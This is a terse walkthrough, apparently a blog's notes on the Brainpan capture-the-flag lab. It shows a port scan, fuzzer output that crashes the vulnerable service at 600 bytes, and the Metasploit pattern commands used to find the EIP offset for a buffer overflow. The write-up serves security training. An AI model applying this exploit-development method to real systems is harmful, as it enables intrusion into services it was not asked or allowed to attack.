https://tryhackme.com/room/brainpan
Vulnhub - Brainpan 1 Walkthrough - StefLan's Security Blog
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
Navigating to port http://<ip>:10000/bin
and we will get our brainpan.exe
When we run the brainpan.exe
we will open port 9999
┌──(kali㉿kali)-[~]
└─$ wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
fuzzer.py
┌──(kali㉿kali)-[~]
└─$ python 1-fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes
Use msf-pattern_create
+400 from the previous crashed size
msf-pattern_create -l 1000
find-offset.py
Getting our EIP 35724134
msf-pattern_offset -l <crashed_size> -q <EIP>